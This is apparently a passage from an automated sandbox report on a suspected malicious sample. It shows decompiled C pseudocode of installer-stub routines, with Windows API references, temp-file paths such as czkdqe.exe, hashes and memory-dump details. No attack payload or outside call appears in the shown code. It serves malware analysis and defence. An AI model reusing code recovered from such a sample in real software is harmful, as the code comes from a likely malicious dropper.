                                                                                    0x00406830
                                                                                    0x00406830
                                                                                    0x00000000
                                                                                    0x00406830
                                                                                    0x00406818
                                                                                    0x00406821
                                                                                    0x00406824
                                                                                    0x0040682a
                                                                                    0x0040682e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040682e
                                                                                    0x004067f6
                                                                                    0x004067f8
                                                                                    0x004067fa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067fa
                                                                                    0x00000000
                                                                                    0x00406834
                                                                                    0x004067c0
                                                                                    0x00000000
                                                                                    0x0040677a
                                                                                    0x00406798
                                                                                    0x004067a1
                                                                                    0x0040683e
                                                                                    0x00406842
                                                                                    0x0040684a
                                                                                    0x0040684a
                                                                                    0x00000000
                                                                                    0x00406842
                                                                                    0x004067ab
                                                                                    0x00406838
                                                                                    0x0040683c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040683c
                                                                                    0x00406778
                                                                                    0x00000000
                                                                                    0x00406705

                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,00000400), ref: 004067C0
                                                                                    • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                                    • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                    • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                    • String ID: "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                    • API String ID: 4260037668-4282540682
                                                                                    • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                    • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                                    • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                    • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004056CA(signed int _a4, WCHAR* _a8) {
                                                                                    				struct HWND__* _v8;
                                                                                    				signed int _v12;
                                                                                    				WCHAR* _v32;
                                                                                    				long _v44;
                                                                                    				int _v48;
                                                                                    				void* _v52;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				WCHAR* _t27;
                                                                                    				signed int _t28;
                                                                                    				long _t29;
                                                                                    				signed int _t37;
                                                                                    				signed int _t38;
                                                                                    
                                                                                    				_t27 =  *0x429244;
                                                                                    				_v8 = _t27;
                                                                                    				if(_t27 != 0) {
                                                                                    					_t37 =  *0x42a314;
                                                                                    					_v12 = _t37;
                                                                                    					_t38 = _t37 & 0x00000001;
                                                                                    					if(_t38 == 0) {
                                                                                    						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                                                                                    					}
                                                                                    					_t27 = lstrlenW(0x422728);
                                                                                    					_a4 = _t27;
                                                                                    					if(_a8 == 0) {
                                                                                    						L6:
                                                                                    						if((_v12 & 0x00000004) == 0) {
                                                                                    							_t27 = SetWindowTextW( *0x429228, 0x422728);
                                                                                    						}
                                                                                    						if((_v12 & 0x00000002) == 0) {
                                                                                    							_v32 = 0x422728;
                                                                                    							_v52 = 1;
                                                                                    							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                                                                    							_v44 = 0;
                                                                                    							_v48 = _t29 - _t38;
                                                                                    							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                                                                    							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                                                                    						}
                                                                                    						if(_t38 != 0) {
                                                                                    							_t28 = _a4;
                                                                                    							0x422728[_t28] = 0;
                                                                                    							return _t28;
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t27 = lstrlenW(_a8) + _a4;
                                                                                    						if(_t27 < 0x1000) {
                                                                                    							_t27 = lstrcatW(0x422728, _a8);
                                                                                    							goto L6;
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				return _t27;
                                                                                    			}

















                                                                                    0x004056d0
                                                                                    0x004056da
                                                                                    0x004056df
                                                                                    0x004056e5
                                                                                    0x004056f0
                                                                                    0x004056f3
                                                                                    0x004056f6
                                                                                    0x004056fc
                                                                                    0x004056fc
                                                                                    0x00405702
                                                                                    0x0040570a
                                                                                    0x0040570d
                                                                                    0x0040572a
                                                                                    0x0040572e
                                                                                    0x00405737
                                                                                    0x00405737
                                                                                    0x00405741
                                                                                    0x0040574a
                                                                                    0x00405756
                                                                                    0x0040575d
                                                                                    0x00405761
                                                                                    0x00405764
                                                                                    0x00405777
                                                                                    0x00405785
                                                                                    0x00405785
                                                                                    0x00405789
                                                                                    0x0040578b
                                                                                    0x0040578e
                                                                                    0x00000000
                                                                                    0x0040578e
                                                                                    0x0040570f
                                                                                    0x00405717
                                                                                    0x0040571f
                                                                                    0x00405725
                                                                                    0x00000000
                                                                                    0x00405725
                                                                                    0x0040571f
                                                                                    0x0040570d
                                                                                    0x0040579a

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                    • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                    • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                    • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                      • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                      • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                    • String ID: ('B
                                                                                    • API String ID: 1495540970-2332581011
                                                                                    • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                    • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                                    • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                    • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                    				struct tagLOGBRUSH _v16;
                                                                                    				long _t39;
                                                                                    				long _t41;
                                                                                    				void* _t44;
                                                                                    				signed char _t50;
                                                                                    				long* _t54;
                                                                                    
                                                                                    				if(_a4 + 0xfffffecd > 5) {
                                                                                    					L18:
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                    				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                    					goto L18;
                                                                                    				} else {
                                                                                    					_t50 = _t54[5];
                                                                                    					if((_t50 & 0xffffffe0) != 0) {
                                                                                    						goto L18;
                                                                                    					}
                                                                                    					_t39 =  *_t54;
                                                                                    					if((_t50 & 0x00000002) != 0) {
                                                                                    						_t39 = GetSysColor(_t39);
                                                                                    					}
                                                                                    					if((_t54[5] & 0x00000001) != 0) {
                                                                                    						SetTextColor(_a8, _t39);
                                                                                    					}
                                                                                    					SetBkMode(_a8, _t54[4]);
                                                                                    					_t41 = _t54[1];
                                                                                    					_v16.lbColor = _t41;
                                                                                    					if((_t54[5] & 0x00000008) != 0) {
                                                                                    						_t41 = GetSysColor(_t41);
                                                                                    						_v16.lbColor = _t41;
                                                                                    					}
                                                                                    					if((_t54[5] & 0x00000004) != 0) {
                                                                                    						SetBkColor(_a8, _t41);
                                                                                    					}
                                                                                    					if((_t54[5] & 0x00000010) != 0) {
                                                                                    						_v16.lbStyle = _t54[2];
                                                                                    						_t44 = _t54[3];
                                                                                    						if(_t44 != 0) {
                                                                                    							DeleteObject(_t44);
                                                                                    						}
                                                                                    						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                    					}
                                                                                    					return _t54[3];
                                                                                    				}
                                                                                    			}









                                                                                    0x0040463d
                                                                                    0x004046f3
                                                                                    0x00000000
                                                                                    0x004046f3
                                                                                    0x0040464e
                                                                                    0x00404652
                                                                                    0x00000000
                                                                                    0x0040466c
                                                                                    0x0040466c
                                                                                    0x00404675
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404677
                                                                                    0x00404683
                                                                                    0x00404686
                                                                                    0x00404686
                                                                                    0x0040468c
                                                                                    0x00404692
                                                                                    0x00404692
                                                                                    0x0040469e
                                                                                    0x004046a4
                                                                                    0x004046ab
                                                                                    0x004046ae
                                                                                    0x004046b1
                                                                                    0x004046b3
                                                                                    0x004046b3
                                                                                    0x004046bb
                                                                                    0x004046c1
                                                                                    0x004046c1
                                                                                    0x004046cb
                                                                                    0x004046d0
                                                                                    0x004046d3
                                                                                    0x004046d8
                                                                                    0x004046db
                                                                                    0x004046db
                                                                                    0x004046eb
                                                                                    0x004046eb
                                                                                    0x00000000
                                                                                    0x004046ee

                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                    • GetSysColor.USER32(00000000), ref: 00404686
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                    • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                    • GetSysColor.USER32(?), ref: 004046B1
                                                                                    • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                    • DeleteObject.GDI32(?), ref: 004046DB
                                                                                    • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2320649405-0
                                                                                    • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                    • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                    • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                    • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 87%
                                                                                    			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                                    				intOrPtr _t65;
                                                                                    				intOrPtr _t66;
                                                                                    				intOrPtr _t72;
                                                                                    				void* _t76;
                                                                                    				void* _t79;
                                                                                    
                                                                                    				_t72 = __edx;
                                                                                    				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                    				_t65 = 2;
                                                                                    				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                                    				_t66 = E00402D84(_t65);
                                                                                    				_t79 = _t66 - 1;
                                                                                    				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                                    				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                                    				if(_t79 < 0) {
                                                                                    					L36:
                                                                                    					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                                                                    				} else {
                                                                                    					__ecx = 0x3ff;
                                                                                    					if(__eax > 0x3ff) {
                                                                                    						 *(__ebp - 0x44) = 0x3ff;
                                                                                    					}
                                                                                    					if( *__edi == __bx) {
                                                                                    						L34:
                                                                                    						__ecx =  *(__ebp - 0xc);
                                                                                    						__eax =  *(__ebp - 8);
                                                                                    						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                    						if(_t79 == 0) {
                                                                                    							 *(_t76 - 4) = 1;
                                                                                    						}
                                                                                    						goto L36;
                                                                                    					} else {
                                                                                    						 *(__ebp - 0x38) = __ebx;
                                                                                    						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                                                                                    						if( *(__ebp - 0x44) > __ebx) {
                                                                                    							do {
                                                                                    								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                                    									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                                                                                    										__eax = __ebp - 0x50;
                                                                                    										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                                    											goto L34;
                                                                                    										} else {
                                                                                    											goto L21;
                                                                                    										}
                                                                                    									} else {
                                                                                    										goto L34;
                                                                                    									}
                                                                                    								} else {
                                                                                    									__eax = __ebp - 0x40;
                                                                                    									_push(__ebx);
                                                                                    									_push(__ebp - 0x40);
                                                                                    									__eax = 2;
                                                                                    									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                                    									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                                                    									if(__eax == 0) {
                                                                                    										goto L34;
                                                                                    									} else {
                                                                                    										__ecx =  *(__ebp - 0x40);
                                                                                    										if(__ecx == __ebx) {
                                                                                    											goto L34;
                                                                                    										} else {
                                                                                    											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                    											 *(__ebp - 0x4c) = __ecx;
                                                                                    											 *(__ebp - 0x50) = __eax;
                                                                                    											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                    												L28:
                                                                                    												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                    											} else {
                                                                                    												__ebp - 0x50 = __ebp + 0xa;
                                                                                    												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                                    													L21:
                                                                                    													__eax =  *(__ebp - 0x50);
                                                                                    												} else {
                                                                                    													__edi =  *(__ebp - 0x4c);
                                                                                    													__edi =  ~( *(__ebp - 0x4c));
                                                                                    													while(1) {
                                                                                    														_t22 = __ebp - 0x40;
                                                                                    														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                                    														__eax = 0xfffd;
                                                                                    														 *(__ebp - 0x50) = 0xfffd;
                                                                                    														if( *_t22 == 0) {
                                                                                    															goto L22;
                                                                                    														}
                                                                                    														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                                    														__edi = __edi + 1;
                                                                                    														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                                                    														__eax = __ebp + 0xa;
                                                                                    														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                                    															continue;
                                                                                    														} else {
                                                                                    															goto L21;
                                                                                    														}
                                                                                    														goto L22;
                                                                                    													}
                                                                                    												}
                                                                                    												L22:
                                                                                    												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                    													goto L28;
                                                                                    												} else {
                                                                                    													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                                    														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                    															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                                    															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                                                    														} else {
                                                                                    															__ecx =  *(__ebp - 0xc);
                                                                                    															__edx =  *(__ebp - 8);
                                                                                    															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                    															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                    														}
                                                                                    														goto L34;
                                                                                    													} else {
                                                                                    														__ecx =  *(__ebp - 0xc);
                                                                                    														__edx =  *(__ebp - 8);
                                                                                    														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                    														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                    														 *(__ebp - 0x38) = __eax;
                                                                                    														if(__ax == __bx) {
                                                                                    															goto L34;
                                                                                    														} else {
                                                                                    															goto L26;
                                                                                    														}
                                                                                    													}
                                                                                    												}
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    								goto L37;
                                                                                    								L26:
                                                                                    								__eax =  *(__ebp - 8);
                                                                                    							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                                    						}
                                                                                    						goto L34;
                                                                                    					}
                                                                                    				}
                                                                                    				L37:
                                                                                    				return 0;
                                                                                    			}








                                                                                    0x004026ec
                                                                                    0x004026ee
                                                                                    0x004026f1
                                                                                    0x004026f3
                                                                                    0x004026f6
                                                                                    0x004026fb
                                                                                    0x004026ff
                                                                                    0x00402702
                                                                                    0x00402705
                                                                                    0x00402c2a
                                                                                    0x00402c2d
                                                                                    0x0040270b
                                                                                    0x0040270b
                                                                                    0x00402712
                                                                                    0x00402714
                                                                                    0x00402714
                                                                                    0x0040271a
                                                                                    0x0040287e
                                                                                    0x0040287e
                                                                                    0x00402881
                                                                                    0x00402886
                                                                                    0x004015b6
                                                                                    0x0040292e
                                                                                    0x0040292e
                                                                                    0x00000000
                                                                                    0x00402720
                                                                                    0x00402721
                                                                                    0x0040272c
                                                                                    0x0040272f
                                                                                    0x0040273b
                                                                                    0x0040273f
                                                                                    0x004027d7
                                                                                    0x004027ef
                                                                                    0x004027ff
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402745
                                                                                    0x00402745
                                                                                    0x00402748
                                                                                    0x00402749
                                                                                    0x0040274c
                                                                                    0x00402751
                                                                                    0x00402758
                                                                                    0x00402760
                                                                                    0x00000000
                                                                                    0x00402766
                                                                                    0x00402766
                                                                                    0x0040276b
                                                                                    0x00000000
                                                                                    0x00402771
                                                                                    0x00402771
                                                                                    0x00402779
                                                                                    0x0040277c
                                                                                    0x0040277f
                                                                                    0x0040283a
                                                                                    0x00402841
                                                                                    0x00402785
                                                                                    0x0040278b
                                                                                    0x00402797
                                                                                    0x00402801
                                                                                    0x00402801
                                                                                    0x00402799
                                                                                    0x00402799
                                                                                    0x0040279c
                                                                                    0x0040279e
                                                                                    0x0040279e
                                                                                    0x0040279e
                                                                                    0x004027a1
                                                                                    0x004027a6
                                                                                    0x004027a9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004027ab
                                                                                    0x004027ae
                                                                                    0x004027bc
                                                                                    0x004027c2
                                                                                    0x004027d0
                                                                                    0x00000000
                                                                                    0x004027d2
                                                                                    0x00000000
                                                                                    0x004027d2
                                                                                    0x00000000
                                                                                    0x004027d0
                                                                                    0x0040279e
                                                                                    0x00402804
                                                                                    0x00402807
                                                                                    0x00000000
                                                                                    0x00402809
                                                                                    0x0040280e
                                                                                    0x0040284f
                                                                                    0x00402871
                                                                                    0x00402878
                                                                                    0x0040285d
                                                                                    0x0040285d
                                                                                    0x00402860
                                                                                    0x00402863
                                                                                    0x00402866
                                                                                    0x00402866
                                                                                    0x00000000
                                                                                    0x00402817
                                                                                    0x00402817
                                                                                    0x0040281a
                                                                                    0x0040281d
                                                                                    0x00402823
                                                                                    0x00402827
                                                                                    0x0040282a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040282a
                                                                                    0x0040280e
                                                                                    0x00402807
                                                                                    0x0040277f
                                                                                    0x0040276b
                                                                                    0x00402760
                                                                                    0x00000000
                                                                                    0x0040282c
                                                                                    0x0040282c
                                                                                    0x0040282f
                                                                                    0x00402838
                                                                                    0x00000000
                                                                                    0x0040272f
                                                                                    0x0040271a
                                                                                    0x00402c33
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                      • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                    • String ID: 9
                                                                                    • API String ID: 163830602-2366072709
                                                                                    • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                    • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                                    • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                    • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 91%
                                                                                    			E004068EF(WCHAR* _a4) {
                                                                                    				short _t5;
                                                                                    				short _t7;
                                                                                    				WCHAR* _t19;
                                                                                    				WCHAR* _t20;
                                                                                    				WCHAR* _t21;
                                                                                    
                                                                                    				_t20 = _a4;
                                                                                    				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                    					_t20 =  &(_t20[4]);
                                                                                    				}
                                                                                    				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                                                                                    					_t20 =  &(_t20[2]);
                                                                                    				}
                                                                                    				_t5 =  *_t20;
                                                                                    				_t21 = _t20;
                                                                                    				_t19 = _t20;
                                                                                    				if(_t5 != 0) {
                                                                                    					do {
                                                                                    						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                                                                                    							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                    							_t19 = CharNextW(_t19);
                                                                                    						}
                                                                                    						_t20 = CharNextW(_t20);
                                                                                    						_t5 =  *_t20;
                                                                                    					} while (_t5 != 0);
                                                                                    				}
                                                                                    				 *_t19 =  *_t19 & 0x00000000;
                                                                                    				while(1) {
                                                                                    					_push(_t19);
                                                                                    					_push(_t21);
                                                                                    					_t19 = CharPrevW();
                                                                                    					_t7 =  *_t19;
                                                                                    					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                    						break;
                                                                                    					}
                                                                                    					 *_t19 =  *_t19 & 0x00000000;
                                                                                    					if(_t21 < _t19) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					break;
                                                                                    				}
                                                                                    				return _t7;
                                                                                    			}








                                                                                    0x004068f1
                                                                                    0x004068fa
                                                                                    0x00406911
                                                                                    0x00406911
                                                                                    0x00406918
                                                                                    0x00406924
